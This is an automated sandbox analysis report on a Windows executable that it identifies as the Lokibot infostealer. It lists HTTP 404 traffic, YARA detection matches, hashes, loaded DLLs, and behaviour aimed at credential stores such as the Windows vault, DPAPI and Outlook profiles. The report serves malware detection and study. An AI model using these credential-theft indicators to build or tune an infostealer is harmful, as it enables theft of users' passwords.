                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                      Source: EozUxz4ybi.exeString found in binary or memory: http://www.ibsensoftware.com/

                      System Summary

                      barindex
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_0040549C0_2_0040549C
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_004029D40_2_004029D4
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: String function: 00405B6F appears 41 times
                      Source: EozUxz4ybi.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: EozUxz4ybi.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@0/1
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040650A
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,0_2_0040434D
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\7ec63eecc011967c28496572961d2a7c_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: EozUxz4ybi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: EozUxz4ybi.exe, 00000000.00000003.1443534413.0000000002105000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: EozUxz4ybi.exeVirustotal: Detection: 86%
                      Source: EozUxz4ybi.exeReversingLabs: Detection: 100%
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: EozUxz4ybi.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR
                      Source: EozUxz4ybi.exeStatic PE information: section name: .x
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
